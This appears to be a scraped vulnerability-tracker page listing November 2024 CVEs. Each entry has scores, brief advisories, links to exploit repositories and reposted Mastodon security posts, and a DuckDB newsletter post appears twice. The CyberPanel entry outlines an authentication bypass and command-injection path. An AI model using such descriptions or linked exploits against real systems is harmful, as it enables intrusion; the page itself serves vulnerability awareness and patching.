Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-49039
(8.8 HIGH)

EPSS: 1.23%

updated 2024-11-12T18:31:00

7 posts

Windows Task Scheduler Elevation of Privilege Vulnerability

1 repos

https://github.com/je5442804/WPTaskScheduler_CVE-2024-49039

verbrecher@mastodon.social at 2024-11-14T22:26:32.000Z ##

Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:

🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.

🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.

⚠️ Immediate Action: Update your systems now to block these dangerous exploits!

##

ChrisShort@hachyderm.io at 2024-11-14T20:45:32.000Z ##

CVE-2024-49039 - Security Update Guide - Microsoft - Windows Task Scheduler Elevation of Privilege Vulnerability #SuggestedRead #devopsish msrc.microsoft.com/update-guid

##

jos1264@social.skynetcloud.site at 2024-11-12T21:20:03.000Z ##

Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) helpnetsecurity.com/2024/11/12 #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE

##

cisakevtracker@mastodon.social at 2024-11-12T19:01:55.000Z ##

CVE ID: CVE-2024-49039
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows Task Scheduler Privilege Escalation Vulnerability
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

mttaggart@infosec.exchange at 2024-11-12T18:54:56.000Z ##

Some fairly interesting stuff for this #PatchTuesday!

Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.

zerodayinitiative.com/blog/202

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-43639
(9.8 CRITICAL)

EPSS: 0.14%

updated 2024-11-12T18:30:59

3 posts

Windows Kerberos Remote Code Execution Vulnerability

CVE-2024-51567
(10.0 CRITICAL)

EPSS: 40.13%

updated 2024-11-08T21:34:54

3 posts

upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and

2 repos

https://github.com/thehash007/CVE-2024-51567-RCE-EXPLOIT

https://github.com/ajayalf/CVE-2024-51567

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:01:08.000Z ##

CVE ID: CVE-2024-51567
Vendor: CyberPersons
Product: CyberPanel
Date Added: 2024-11-07
Vulnerability: CyberPanel Incorrect Default Permissions Vulnerability
Notes: cyberpanel.net/blog/detials-an ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2024-5910
(9.8 CRITICAL)

EPSS: 97.10%

updated 2024-11-08T21:33:52

9 posts

Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition. Note: Expedition is a tool aiding in configuration migration, tuning, and enrichment. Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue.

Nuclei template

1 repos

#search_error

jos1264@social.skynetcloud.site at 2024-11-09T01:20:02.000Z ##

Palo Alto Expedition Missing Authentication Vulnerability (CVE-2024-5910) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2024-11-08T16:40:03.000Z ##

CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild cyble.com/blog/cisa-finds-palo #Cybernews

##

oversecurity@mastodon.social at 2024-11-08T16:40:07.000Z ##

CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild

The flaw is a missing authentication vulnerability that allows an attacker with network access to takeover Palo Alto Expedition’s admin account and...

🔗️ [Cyble] link.is.it/85zu1w

##

jbhall56@infosec.exchange at 2024-11-08T12:55:20.000Z ##

The vulnerability is tracked as CVE-2024-5910 and it was patched by Palo Alto Networks in July. securityweek.com/palo-alto-net

##

jos1264@social.skynetcloud.site at 2024-11-08T12:20:04.000Z ##

Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910) helpnetsecurity.com/2024/11/08 #PaloAltoNetworks #vulnerability #Horizon3.ai #Don'tmiss #Hotstuff #News #CVE #PoC

##

jos1264@social.skynetcloud.site at 2024-11-08T12:20:03.000Z ##

CISA Alerts Fed Agencies of Active Exploitation of Palo Alto Networks’ CVE-2024-5910 thecyberexpress.com/cisa-alert #ExpeditionVulnerability #paloaltonetworks #TheCyberExpress #CVE-2024-5910 #Vulnerability #CyberNews #PaloAlto

##

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:06:24.000Z ##

CVE ID: CVE-2024-5910
Vendor: Palo Alto
Product: Expedition
Date Added: 2024-11-07
Vulnerability: Palo Alto Expedition Missing Authentication Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2024-40715
(7.7 HIGH)

EPSS: 0.07%

updated 2024-11-08T19:01:03.880000

1 posts

A vulnerability in Veeam Backup & Replication Enterprise Manager has been identified, which allows attackers to perform authentication bypass. Attackers must be able to perform Man-in-the-Middle (MITM) attack to exploit this vulnerability.

screaminggoat@infosec.exchange at 2024-11-08T14:04:25.000Z ##

Veeam security advisory from 06 November 2024 Veeam Backup Enterprise Manager Vulnerability (CVE-2024-40715)
CVE-2024-40715 (7.7 high) Veeam Backup & Replication Enterprise Manager authentication bypass while performing a Man-in-the-Middle (MITM) attack. No mention of exploitation.

#cybersecurity #infosec #vulnerability #CVE #veeam #cve_2024_40715

##

CVE-2020-11921
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-08T18:31:57

1 posts

An issue was discovered in Lush 2 through 2020-02-25. Due to the lack of Bluetooth traffic encryption, it is possible to hijack an ongoing Bluetooth connection between the Lush 2 and a mobile phone. This allows an attacker to gain full control over the device.

micah@tech.lgbt at 2024-11-12T09:58:01.000Z ##

Lovense's Lush 2 'massage' toy getting it's own CVE is hilarious

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-51998
(8.6 HIGH)

EPSS: 0.04%

updated 2024-11-08T13:55:32

1 posts

### Summary The validation for the file URI scheme falls short, and results in an attacker being able to read any file on the system. This issue only affects instances with a webdriver enabled, and `ALLOW_FILE_URI` false or not defined. ### Details The check used for URL protocol, `is_safe_url`, allows `file:` as a URL scheme: https://github.com/dgtlmoon/changedetection.io/blob/e0abf0b50507a8a

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.

Subscribe

TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):

INSTALL gsheets FROM community;LOAD gsheets;

Basic usage patterns include:

-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;CREATE PERSISTENT SECRET (  TYPE gsheet,   PROVIDER access_token,   TOKEN 'yOUrToK3nH3re');

And, now we can look at the “schema”:

$ duckdb -json -c "  LOAD gsheets;   FROM read_gsheet(    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',     sheet = 'Sheet1'  )   LIMIT 1" | jq[  {    "Vendor": "Sophos",    "Title": "Sophos SFOS SQL Injection Vulnerability",    "CVE": "CVE-2020-12271",    "CVSS": 9.8,    "Date of NVD publication": "4/27/20",    "Date of vendor advisory": "Unknown",    "Used in ransomware attacks?": "Known",    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",    "Date added to KEV Catalog": "11/3/21",    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",    "Date of Known Exploitation": "Apr-20",    "Threat actor": "Unknown",    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",    "Metasploit Module": "N",    "GreyNoise (#of Malicious IPs Scanning)": 0.0,    "Number of vulnerable devices": "?",    "Number of impacted devices": "?",    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"  }]

And, perform normal ops on it:

$ duckdb -table -c "LOAD gsheets;FROM read_gsheet(  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',  sheet='Sheet1')SELECT  Vendor,  COUNT(Vendor) AS ctGROUP BY  VendorORDER BY  2 DESC"+---------------------+----+|       Vendor        | ct |+---------------------+----+| Cisco               | 72 || D-Link              | 19 || Ivanti              | 18 || Citrix              | 16 || Fortinet            | 13 || SonicWall           | 10 || Zyxel               | 9  || NETGEAR             | 8  || Juniper             | 6  || F5                  | 6  || PANW                | 5  || Sophos              | 5  || DrayTek             | 3  || Tenda               | 3  || TP-Link             | 2  || MikroTik            | 2  || Dasan               | 2  || Check Point         | 1  || D-Link and TRENDnet | 1  || Barracuda           | 1  || Netis               | 1  || FatPipe             | 1  || Arcadyan            | 1  || Sumavision          | 1  |+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.

The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432. (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

Photo by Samson Andreea on Pexels.com

The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (WITH   __req AS (    SELECT      http_get(        'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'      ) AS res  ),  __res AS (    SELECT      UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') )      AS cves    FROM      __req  ) FROM __res);

We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.

What that query returns is an array of deeply nexted JSON records:

FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│                                     cves                                     ││                                     json                                     │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB let’s us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all its worth:

FROM yesterdaySELECT   cves->>'cve'->>'vulnStatus' AS vulnStatus,  COUNT() AS ct,  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│     vulnStatus      │  ct   │  pct   ││       varchar       │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis   │    83 │  65.87 ││ Received            │    34 │  26.98 ││ Undergoing Analysis │     9 │   7.14 │└─────────────────────┴───────┴────────┘

You can add headers, and use getenv(var) to fill in things like API keys.

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##

CVE-2024-51987
(5.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-08T13:55:27

1 posts

### Impact HTTP Clients created by `AddUserAccessTokenHttpClient` may use a different user's access token after a token refresh. This occurs because a refreshed token will be captured in pooled `HttpClient` instances, which may be used by a different user. ### Workarounds Instead of using `AddUserAccessTokenHttpClient` to create an `HttpClient` that automatically adds a managed token to outgoing

1 repos

#search_error

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.

Subscribe

TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):

INSTALL gsheets FROM community;LOAD gsheets;

Basic usage patterns include:

-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;CREATE PERSISTENT SECRET (  TYPE gsheet,   PROVIDER access_token,   TOKEN 'yOUrToK3nH3re');

And, now we can look at the “schema”:

$ duckdb -json -c "  LOAD gsheets;   FROM read_gsheet(    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',     sheet = 'Sheet1'  )   LIMIT 1" | jq[  {    "Vendor": "Sophos",    "Title": "Sophos SFOS SQL Injection Vulnerability",    "CVE": "CVE-2020-12271",    "CVSS": 9.8,    "Date of NVD publication": "4/27/20",    "Date of vendor advisory": "Unknown",    "Used in ransomware attacks?": "Known",    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",    "Date added to KEV Catalog": "11/3/21",    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",    "Date of Known Exploitation": "Apr-20",    "Threat actor": "Unknown",    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",    "Metasploit Module": "N",    "GreyNoise (#of Malicious IPs Scanning)": 0.0,    "Number of vulnerable devices": "?",    "Number of impacted devices": "?",    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"  }]

And, perform normal ops on it:

$ duckdb -table -c "LOAD gsheets;FROM read_gsheet(  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',  sheet='Sheet1')SELECT  Vendor,  COUNT(Vendor) AS ctGROUP BY  VendorORDER BY  2 DESC"+---------------------+----+|       Vendor        | ct |+---------------------+----+| Cisco               | 72 || D-Link              | 19 || Ivanti              | 18 || Citrix              | 16 || Fortinet            | 13 || SonicWall           | 10 || Zyxel               | 9  || NETGEAR             | 8  || Juniper             | 6  || F5                  | 6  || PANW                | 5  || Sophos              | 5  || DrayTek             | 3  || Tenda               | 3  || TP-Link             | 2  || MikroTik            | 2  || Dasan               | 2  || Check Point         | 1  || D-Link and TRENDnet | 1  || Barracuda           | 1  || Netis               | 1  || FatPipe             | 1  || Arcadyan            | 1  || Sumavision          | 1  |+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.

The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432. (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

Photo by Samson Andreea on Pexels.com

The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (WITH   __req AS (    SELECT      http_get(        'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'      ) AS res  ),  __res AS (    SELECT      UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') )      AS cves    FROM      __req  ) FROM __res);

We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.

What that query returns is an array of deeply nexted JSON records:

FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│                                     cves                                     ││                                     json                                     │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB let’s us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all its worth:

FROM yesterdaySELECT   cves->>'cve'->>'vulnStatus' AS vulnStatus,  COUNT() AS ct,  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│     vulnStatus      │  ct   │  pct   ││       varchar       │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis   │    83 │  65.87 ││ Received            │    34 │  26.98 ││ Undergoing Analysis │     9 │   7.14 │└─────────────────────┴───────┴────────┘

You can add headers, and use getenv(var) to fill in things like API keys.

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##

CVE-2024-47072
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-08T13:55:23

1 posts

